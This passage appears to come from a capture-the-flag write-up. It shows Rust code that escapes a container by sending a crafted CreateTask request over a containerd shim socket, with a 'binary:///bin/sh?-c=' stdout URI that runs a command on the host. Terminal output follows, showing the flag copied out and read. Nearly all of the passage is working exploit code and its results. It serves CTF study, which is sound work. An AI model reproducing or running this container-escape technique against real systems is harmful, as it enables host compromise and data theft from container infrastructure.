let task = TaskClient::new(client);
let create_resp = create_task_request(&task);
println!("created task: {:#?}", create_resp);
}
}
fn set_bundle<P: AsRef<Path>, Q: AsRef<Path>>(overlayfs_path: P, inner_path: Q) -> String {
let config_template = include_str!("config.json");
let config = config_template
.replace("{{OVERLAY_ID}}", &get_overlay_id())
.replace("{{CONTAINER_ID}}", &get_container_id());
let config_path = Path::new("/").join(&inner_path).join("config.json");
fs::write(&config_path, config)
.unwrap_or_else(|_| panic!("Failed to write {}", config_path.display()));
let bundle_path = overlayfs_path.as_ref().join(inner_path);
bundle_path.to_string_lossy().into_owned()
}
fn create_task_request(task: &TaskClient) -> CreateTaskResponse {
let mut create_req = CreateTaskRequest::new();
create_req.set_id("PwnedByWings".to_string());
create_req.set_terminal(true);
let bundle_path = set_bundle(get_overlayfs(), "tmp/");
create_req.set_bundle(bundle_path);
let command = format!("docker cp /flag {}:/", get_container_id());
let command = command.replace(" ", "%20");
let payload = format!("binary:///bin/sh?-c={command}");
create_req.set_stdout(payload);
task.create(context::with_timeout(0), &create_req)
.expect("Failed to create task")
}
The result:
/ # ls
bin etc home media opt root sbin sys usr
dev exp lib mnt proc run srv tmp var
/ # ./exp
connecting to unix:///run/containerd/s/88552ed7ac5fb857627ffeabe8b98d2197fda3d27779ff5cc0febdb6d728dc17
created task: CreateTaskResponse {
pid: 660,
special_fields: SpecialFields {
unknown_fields: UnknownFields {
fields: None,
},
cached_size: CachedSize {
size: 0,
},
},
}
/ # ls
bin etc flag lib mnt proc run srv tmp var
dev exp home media opt root sbin sys usr
/ # cat flag
flag{escaped}
(Half a year for just this much — shelving it for now.)